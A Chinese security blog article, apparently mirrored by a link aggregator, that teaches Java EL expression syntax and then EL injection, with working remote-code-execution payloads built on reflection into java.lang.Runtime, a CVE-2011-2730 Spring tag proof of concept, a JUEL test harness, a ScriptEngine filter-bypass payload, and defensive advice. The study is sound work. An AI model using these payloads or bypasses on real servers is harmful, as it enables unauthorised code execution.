4

(先知首发)浅析EL表达式注入漏洞

 3 years ago
source link: https://www.mi1k7ea.com/2020/04/26/%E6%B5%85%E6%9E%90EL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

先知:https://xz.aliyun.com/t/7692

0x01 EL简介

EL(Expression Language) 是为了使JSP写起来更加简单。表达式语言的灵感来自于 ECMAScript 和 XPath 表达式语言,它提供了在 JSP 中简化表达式的方法,让Jsp的代码更加简化。

EL表达式主要功能如下:

  • 获取数据:EL表达式主要用于替换JSP页面中的脚本表达式,以从各种类型的Web域中检索Java对象、获取数据(某个Web域中的对象,访问JavaBean的属性、访问List集合、访问Map集合、访问数组);
  • 执行运算:利用EL表达式可以在JSP页面中执行一些基本的关系运算、逻辑运算和算术运算,以在JSP页面中完成一些简单的逻辑运算,例如${user==null}
  • 获取Web开发常用对象:EL表达式定义了一些隐式对象,利用这些隐式对象,Web开发人员可以很轻松获得对Web常用对象的引用,从而获得这些对象中的数据;
  • 调用Java方法:EL表达式允许用户开发自定义EL函数,以在JSP页面中通过EL表达式调用Java类的方法;

0x02 基本语法

在JSP中访问模型对象是通过EL表达式的语法来表达。所有EL表达式的格式都是以${}表示。例如,${ userinfo}代表获取变量userinfo的值。当EL表达式中的变量不给定范围时,则默认在page范围查找,然后依次在request、session、application范围查找。也可以用范围作为前缀表示属于哪个范围的变量,例如:${ pageScope. userinfo}表示访问page范围中的userinfo变量。

简单地说,使用EL表达式语法:${EL表达式}

其中,EL表达式和JSP代码等价转换。事实上,可以将EL表达式理解为一种简化的JSP代码。

扩展JSP代码的写法总结:

  • JSP表达式:<%=变量或表达式>

    向浏览器输出变量或表达式的计算结果。

  • JSP脚本:<%Java代码%>

    执行java代码的原理:翻译到_jspService()方法中。

  • JSP声明:<%!变量或方法%>

    声明jsp的成员变量或成员方法。

  • JSP注释:<%!--JSP注释--%>

    用于注释JSP代码,不会翻译到Java文件中,也不会执行。

[ ]与.运算符

EL表达式提供.[]两种运算符来存取数据。

当要存取的属性名称中包含一些特殊字符,如.-等并非字母或数字的符号,就一定要使用[]。例如:${user.My-Name}应当改为${user["My-Name"]}

如果要动态取值时,就可以用[]来做,而.无法做到动态取值。例如:${sessionScope.user[data]}中data 是一个变量。

EL表达式存取变量数据的方法很简单,例如:${username}。它的意思是取出某一范围中名称为username的变量。因为我们并没有指定哪一个范围的username,所以它会依序从Page、Request、Session、Application范围查找。假如途中找到username,就直接回传,不再继续找下去,但是假如全部的范围都没有找到时,就回传””。EL表达式的属性如下:

属性范围在EL中的名称

Page PageScope Request RequestScope Session SessionScope Application ApplicationScope

JSP表达式语言定义可在表达式中使用的以下文字:

文字 文字的值 Boolean true 和 false Integer 与 Java 类似。可以包含任何整数,例如 24、-45、567 Floating Point 与 Java 类似。可以包含任何正的或负的浮点数,例如 -1.8E-45、4.567 String 任何由单引号或双引号限定的字符串。对于单引号、双引号和反斜杠,使用反斜杠字符作为转义序列。必须注意,如果在字符串两端使用双引号,则单引号不需要转义。 Null null

JSP表达式语言提供以下操作符,其中大部分是Java中常用的操作符:

术语 定义 算术型 +、-(二元)、*、/、div、%、mod、-(一元) 逻辑型 and、&&、or、双管道符、!、not 关系型 ==、eq、!=、ne、<、lt、>、gt、<=、le、>=、ge。可以与其他值进行比较,或与布尔型、字符串型、整型或浮点型文字进行比较。 空 empty 空操作符是前缀操作,可用于确定值是否为空。 条件型 A ?B :C。根据 A 赋值的结果来赋值 B 或 C。

JSP表达式语言定义了一组隐式对象,其中许多对象在 JSP scriplet 和表达式中可用:

术语 定义 pageContext JSP页的上下文,可以用于访问 JSP 隐式对象,如请求、响应、会话、输出、servletContext 等。例如,${pageContext.response}为页面的响应对象赋值。

此外,还提供几个隐式对象,允许对以下对象进行简易访问:

术语 定义 param 将请求参数名称映射到单个字符串参数值(通过调用 ServletRequest.getParameter (String name) 获得)。getParameter (String) 方法返回带有特定名称的参数。表达式${param . name}相当于 request.getParameter (name)。 paramValues 将请求参数名称映射到一个数值数组(通过调用 ServletRequest.getParameter (String name) 获得)。它与 param 隐式对象非常类似,但它检索一个字符串数组而不是单个值。表达式 ${paramvalues. name} 相当于 request.getParamterValues(name)。 header 将请求头名称映射到单个字符串头值(通过调用 ServletRequest.getHeader(String name) 获得)。表达式 ${header. name} 相当于 request.getHeader(name)。 headerValues 将请求头名称映射到一个数值数组(通过调用 ServletRequest.getHeaders(String) 获得)。它与头隐式对象非常类似。表达式${headerValues. name}相当于 request.getHeaderValues(name)。 cookie 将 cookie 名称映射到单个 cookie 对象。向服务器发出的客户端请求可以获得一个或多个 cookie。表达式${cookie. name .value}返回带有特定名称的第一个 cookie 值。如果请求包含多个同名的 cookie,则应该使用${headerValues. name}表达式。 initParam 将上下文初始化参数名称映射到单个值(通过调用 ServletContext.getInitparameter(String name) 获得)。

除了上述两种类型的隐式对象之外,还有些对象允许访问多种范围的变量,如 Web 上下文、会话、请求、页面:

术语 定义 pageScope 将页面范围的变量名称映射到其值。例如,EL 表达式可以使用${pageScope.objectName}访问一个 JSP 中页面范围的对象,还可以使用${pageScope .objectName. attributeName}访问对象的属性。 requestScope 将请求范围的变量名称映射到其值。该对象允许访问请求对象的属性。例如,EL 表达式可以使用${requestScope. objectName}访问一个 JSP 请求范围的对象,还可以使用${requestScope. objectName. attributeName}访问对象的属性。 sessionScope 将会话范围的变量名称映射到其值。该对象允许访问会话对象的属性。例如:${sessionScope. name} applicationScope 将应用程序范围的变量名称映射到其值。该隐式对象允许访问应用程序范围的对象。

pageContext对象

pageContext对象是JSP中pageContext对象的引用。通过pageContext对象,您可以访问request对象。比如,访问request对象传入的查询字符串,就像这样:

  1. ${pageContext.request.queryString}

1.png

Scope对象

pageScope,requestScope,sessionScope,applicationScope变量用来访问存储在各个作用域层次的变量。

举例来说,如果您需要显式访问在applicationScope层的box变量,可以这样来访问:applicationScope.box。

  1. <%
    pageContext.setAttribute("name","mi1k7ea_page");
    request.setAttribute("name","mi1k7ea_request");
    session.setAttribute("user","mi1k7ea_session");
    application.setAttribute("user","mi1k7ea_application");
    %>

    pageScope.name:${pageScope.name}
    </br>
    requestScope.name : ${requestScope.name}
    </br>
    sessionScope.user : ${sessionScope.user}
    </br>
    applicationScope.user : ${applicationScope.user}

5.png

param和paramValues对象

param和paramValues对象用来访问参数值,通过使用request.getParameter方法和request.getParameterValues方法。

举例来说,访问一个名为order的参数,可以这样使用表达式:${param.order},或者${param[“order”]}。

接下来的例子表明了如何访问request中的username参数:

  1. <%@ page import="java.io.*,java.util.*" %>
    <%
    String title = "Accessing Request Param";
    %>
    <html>
    <head>
    <title><% out.print(title); %></title>
    </head>
    <body>
    <center>
    <h1><% out.print(title); %></h1>
    </center>
    <div align="center">
    <p>${param["username"]}</p>
    </div>
    </body>
    </html>

param对象返回单一的字符串,而paramValues对象则返回一个字符串数组。

2.png

header和headerValues对象

header和headerValues对象用来访问信息头,通过使用request.getHeader()方法和request.getHeaders()方法。

举例来说,要访问一个名为user-agent的信息头,可以这样使用表达式:${header.user-agent},或者${header["user-agent"]}

接下来的例子表明了如何访问user-agent信息头:

  1. <%@ page import="java.io.*,java.util.*" %>
    <%
    String title = "User Agent Example";
    %>
    <html>
    <head>
    <title><% out.print(title); %></title>
    </head>
    <body>
    <center>
    <h1><% out.print(title); %></h1>
    </center>
    <div align="center">
    <p>${header["user-agent"]}</p>
    </div>
    </body>
    </html>

运行结果如下:

3.png

header对象返回单一值,而headerValues则返回一个字符串数组。

EL中的函数

EL允许您在表达式中使用函数。这些函数必须被定义在自定义标签库中。函数的使用语法如下:

  1. ${ns:func(param1, param2, ...)}

ns指的是命名空间(namespace),func指的是函数的名称,param1指的是第一个参数,param2指的是第二个参数,以此类推。比如,有函数fn:length,在JSTL库中定义,可以像下面这样来获取一个字符串的长度:

  1. ${fn:length("Get my length")}

要使用任何标签库中的函数,您需要将这些库安装在服务器中,然后使用<taglib>标签在JSP文件中包含这些库。

EL表达式调用Java方法

看个例子即可。

先新建一个ELFunc类,其中定义的doSomething()函数用于给输入的参数字符拼接”.com”形成域名返回:

  1. package eltest;

    public class ELFunc {
    public static String doSomething(String str){
    return str + ".com";
    }
    }

接着在WEB-INF文件夹下(除lib和classess目录外)新建test.tld文件,其中指定执行的Java方法及其URI地址:

  1. <?xml version="1.0" encoding="UTF-8"?>
    <taglib version="2.0" xmlns="http://java.sun.com/xml/ns/j2ee"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-jsptaglibrary_2_0.xsd">
    <tlib-version>1.0</tlib-version>
    <short-name>ELFunc</short-name>
    <uri>http://www.mi1k7ea.com/ELFunc</uri>
    <function>
    <name>doSomething</name>
    <function-class>eltest.ELFunc</function-class>
    <function-signature> java.lang.String doSomething(java.lang.String)</function-signature>
    </function>
    </taglib>

JSP文件中,先头部导入taglib标签库,URI为test.tld中设置的URI地址,prefix为test.tld中设置的short-name,然后直接在EL表达式中使用类名:方法名()的形式来调用该类方法即可:

  1. <%@taglib uri="http://www.mi1k7ea.com/ELFunc" prefix="ELFunc"%>
    ${ELFunc:doSomething("mi1k7ea")}

6.png

0x03 JSP中启动/禁用EL表达式

全局禁用EL表达式

web.xml中进入如下配置:

  1. <jsp-config>
    <jsp-property-group>
    <url-pattern>*.jsp</url-pattern>
    <el-ignored>true</el-ignored>
    </jsp-property-group>
    </jsp-config>

单个文件禁用EL表达式

在JSP文件中可以有如下定义:

  1. <%@ page isELIgnored="true" %>

该语句表示是否禁用EL表达式,TRUE表示禁止,FALSE表示不禁止。

JSP2.0中默认的启用EL表达式。

例如如下的JSP代码禁用EL表达式:

  1. <%@ page isELIgnored="true" %>
    ${pageContext.request.queryString}

4.png

0x04 EL表达式注入漏洞

EL表达式注入漏洞和SpEL、OGNL等表达式注入漏洞是一样的漏洞原理的,即表达式外部可控导致攻击者注入恶意表达式实现任意代码执行。

一般的,EL表达式注入漏洞的外部可控点入口都是在Java程序代码中,即Java程序中的EL表达式内容全部或部分是从外部获取的。

通用PoC

  1. //对应于JSP页面中的pageContext对象(注意:取的是pageContext对象)
    ${pageContext}

    //获取Web路径
    ${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

    //文件头参数
    ${header}

    //获取webRoot
    ${applicationScope}

    //执行命令
    ${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc").getInputStream())}

比如我们在Java程序中可以控制输入EL表达式如下:

  1. ${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))}

如果该EL表达式直接在JSP页面中执行,则触发任意代码执行漏洞:

11.png

但是在实际场景中,是几乎没有也无法直接从外部控制JSP页面中的EL表达式的。而目前已知的EL表达式注入漏洞都是框架层面服务端执行的EL表达式外部可控导致的。

CVE-2011-2730

命令执行PoC如下:

  1. <spring:message text=
    "${/"/".getClass().forName(/"java.lang.Runtime/").getMethod(/"getRuntime/",null).invoke(null,null).exec(/"calc/",null).toString()}">
    </spring:message>
  1. <%@ taglib uri="http://www.springframework.org/tags" prefix="spring"%>
    <spring:message text="${param.a}"></spring:message>

访问http://localhost/XXX.jsp?a=$](https://links.jianshu.com/go?to=http%3A%2F%2Flocalhost%2FXXX.jsp%3Fa%3D%24){applicationScope}

容器第一次执行EL表达式${param.a}获得了我们输入的${applicationScope},然后Spring标签获取容器的EL表达式求值对象,把${applicationScope}再次执行掉,形成了漏洞。

Wooyun案例

参考Wooyun镜像上的案例:

搜狗某系统存在远程EL表达式注入漏洞(命令执行)

工商银行某系统存在远程EL表达式注入漏洞(命令执行)

JUEL示例

下面我们直接看下在Java代码中EL表达式注入的场景是怎么样的。

EL曾经是JSTL的一部分。然后,EL进入了JSP 2.0标准。现在,尽管是JSP 2.1的一部分,但EL API已被分离到包javax.el中, 并且已删除了对核心JSP类的所有依赖关系。换句话说:EL已准备好在非JSP应用程序中使用!

也就是说,现在EL表达式所依赖的包javax.el等都在JUEL相关的jar包中。

JUEL(Java Unified Expression Language)是统一表达语言轻量而高效级的实现,具有高性能,插件式缓存,小体积,支持方法调用和多参数调用,可插拔多种特性。

更多参考官网:http://juel.sourceforge.net/

需要的jar包:juel-api-2.2.7、juel-spi-2.2.7、juel-impl-2.2.7。

Test.java,利用反射调用Runtime类方法实现命令执行:

  1. import de.odysseus.el.ExpressionFactoryImpl;
    import de.odysseus.el.util.SimpleContext;

    import javax.el.ExpressionFactory;
    import javax.el.ValueExpression;

    public class Test {
    public static void main(String[] args) {
    ExpressionFactory expressionFactory = new ExpressionFactoryImpl();
    SimpleContext simpleContext = new SimpleContext();
    // failed
    // String exp = "${''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')}";
    // ok
    String exp = "${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc.exe')}";
    ValueExpression valueExpression = expressionFactory.createValueExpression(simpleContext, exp, String.class);
    System.out.println(valueExpression.getValue(simpleContext));
    }
    }

运行即触发:

7.png

0x05 绕过方法

这里针对前面在Java代码中注入EL表达式的例子来演示。其实绕过方法和SpEL表达式注入是一样的。

利用反射机制绕过

即前面Demo的PoC,注意一点的就是这里不支持用字符串拼接的方式绕过关键字过滤。

利用ScriptEngine调用JS引擎绕过

同SpEL注入中讲到的:

  1. ${''.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc')")}

8.png

0x06 防御方法

  • 尽量不使用外部输入的内容作为EL表达式内容;

  • 若使用,则严格过滤EL表达式注入漏洞的payload关键字;

  • 如果是排查Java程序中JUEL相关代码,则搜索如下关键类方法:

    1. javax.el.ExpressionFactory.createValueExpression()
      javax.el.ValueExpression.getValue()

0x07 参考

JSP 表达式语言

EL表达式调用java方法

JAVA WEB EL表达式注入


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK